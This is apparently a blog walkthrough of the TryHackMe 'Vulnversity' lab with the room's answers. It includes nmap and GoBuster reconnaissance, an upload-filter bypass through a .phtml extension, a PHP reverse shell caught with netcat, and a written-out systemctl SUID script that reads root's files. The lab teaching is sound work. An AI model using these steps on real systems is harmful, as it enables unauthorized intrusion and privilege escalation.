Open in app

Sign in

Write

Sign in

Try Hack Me — Vulnversity

BrotherCal
7 min readJul 25, 2020

--

Table of Contents

  1. Introduction
  2. Prerequisites
  3. Deploy the Machine
  4. Reconnaissance
  5. Locating Directories using GoBuster
  6. Compromise the Webserver
  7. Privilege Escalation
  8. Conclusion

Introduction

Today I will be doing a write up for the https://tryhackme.com/ lab “Vulnversity” — You can access this lab here: https://tryhackme.com/room/vulnversity

Prerequisites

If you are unsure to what BurpSuite is, or how to set it up please complete the BurpSuite room first.

Deploy the Machine

Connect to the TryHackMe network and deploy this machine. If you are unsure on how to get connected, complete the OpenVPN room first.

Reconnaissance

First we are going to gather information about this machine using a network scanning tool called nmap.

#1

Scan this box: nmap -sV <machines ip>

The “-sV” argument will show the service version on open ports

#2

Scan the box, how many ports are open?

6

#3

What version of the squid proxy is running on the machine?

3.5.12

#4

How many ports will nmap scan if the flag -p-400 was used?

400

#5

Using the nmap flag -n what will it not resolve?

dns

#6

What is the most likely operating system this machine is running?

to find this we run the “-O” argument to view the OS type

ubuntu

#7

What port is the web server running on?

3333

#8

Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)

Locating Directories using GoBuster

Using a fast directory discovery tool called GoBuster you will locate a directory that you can use to upload a shell to.

#1

Lets first start of by scanning the website to find any hidden directories. To do this, we’re going to use GoBuster.

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

Download GoBuster here, or if you’re on Kali Linux 2020.1+ run sudo apt-get install gobuster

To get started, you will need a wordlist for GoBuster (which will be used to quickly go through the wordlist to identify if there is a public directory available. If you are using Kali Linux you can find many wordlists under /usr/share/wordlists.

Now lets run GoBuster with a wordlist: gobuster dir -u http://<ip>:3333 -w <word list location>

#2

What is the directory that has an upload form page?

/internal/

Compromise the Webserver

Now you have found a form to upload files, we can leverage this to upload and execute our payload that will lead to compromising the web server.

#1

Try upload a few file types to the server, what common extension seems to be blocked?

.php

#2

To identify which extensions are not blocked, we’re going to fuzz the upload form.

To do this, we’re doing to use BurpSuite. If you are unsure to what BurpSuite is, or how to set it up please complete our BurpSuite room first.

#3

We’re going to use Intruder (used for automating customised attacks).

To begin, make a wordlist with the following extensions in:

Now make sure BurpSuite is configured to intercept all your browser traffic. Upload a file, once this request is captured, send it to the Intruder. Click on “Payloads” and select the “Sniper” attack type.

Click the “Positions” tab now, find the filename and “Add §” to the extension. It should look like so:

Run this attack, what extension is allowed?

.phtml

#4

Now we know what extension we can use for our payload we can progress.

We are going to use a PHP reverse shell as our payload. A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you’ll listen for incoming connections, upload and have your shell executed which will beacon out to you to control!

Download the following reverse PHP shell here.

To gain remote access to this machine, follow the

  • Edit the php-reverse-shell.php file and edit the ip to be your tun0 ip (you can get this by going to your access page on TryHackMe and using your internal ip).
  • Rename this file to php-reverse-shell.phtml
  • We’re now going to listen to incoming connections using netcat. Run the following command: nc -lvnp 1234
  • Upload your shell and navigate to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml — This will execute your payload
  • You should see a connection on your netcat session

What is the name of the user who manages the webserver? To do this navigate to the home directory and check the user —

bill

#6

What is the user flag? Change directory into bills and pull the contents of the text file inside via the “cat” command

cat user.txt

Privilege Escalation

Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).

#1

In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.

On the system, search for all SUID files. (to do this run the following: “find / -user root -perm -4000 -exec ls -ldb {} \;”

What file stands out?

systemctl

#2

Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?

Become root and get the last flag (/root/root.txt)

So first thing is first we need to get a stable shell, we can do this by entering the following:

python3 -c "import pty; pty.spawn('/bin/bash')"

Your working directory should now look something similar to :

As we know the device has “systemctl” we can exploit the SUID user permissions. SUID (Set owner User ID up on execution) is a unique file permission that typically inherits its permissions from the logged in user.

Doing some research into systemctl privilege escalation techniques I was pointed towards GTFObins and attempted to run the script provided by them, unfortunately I couldn’t establish a root session so I had to change the configuration a little to the below:

rowls=$(mktemp).service
echo '[Service]
ExecStart=/bin/bash -c "cat /root/root.txt > /home/bill/output.txt"
[Install]
WantedBy=multi-user.target' > $rowls
/bin/systemctl link $rowls
/bin/systemctl enable --now $rowls

so lets break this down a bit for further understanding.

rowls=$(mktemp).service

This creates a new environmental variable with the name “rowls” — the rest will make this a temporary system service file.

echo '[Service]

echo allows us to enter a command into the system and the ‘ allows us to enter multiple lines to finish our entry.

ExecStart=/bin/bash -c "cat /root/root.txt > /home/bill/output.txt"

Once the service has started the system will copy the contents of the file “root.txt” from the root directory and create a new file within “/home/bill” called “output.txt”

[Install]

This points to the secondary part of our services file

WantedBy=multi-user.target' > $rowls

Before the single quote this enables the service to run once hitting run level 3 e.g. before the system uses a GUI, this state is typically used for rack-mounted servers. The quote indicates the ending of our secondary input to the services file and then this is redirected with the “>” to the “$rowls” variable.

/bin/systemctl link $rowls

This allows the “$rowls” variable to be executed by systemctl

/bin/systemctl enable --now $rowls

Finally this immediately enables the previously created system file within “$rowls” and refreshes system manager to ensure this takes affect.

Now all we need to do is grab the flag from our newly created file:

cat /home/bill/output.txt

Conclusion

An amazing lab provided by TryHackMe and the first I’ve attempted where you are set off to do your own research and execution for Privesc, Although I hit some stumbling blocks and even had a helping hand from Heiss at TryHackMe getting my secure shell and some slight code modification we finally reached the end goal.

We were also introduced to GoBuster, abused upload forms to execute php scripts for a reverse shell and continued with our newly found Burpsuite skills.

If you would like to try out this lab you can do so at https://tryhackme.com/

https://twitter.com/Rowls_Cyber

Gobuster
Burpsuite
Tryhackme
Nmap
Netcat

--

--

BrotherCal
BrotherCal

Written by BrotherCal

43 Followers
3 Following

Security Consultant, Gaming Enthusiast, Pokemon TCG Beginner.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams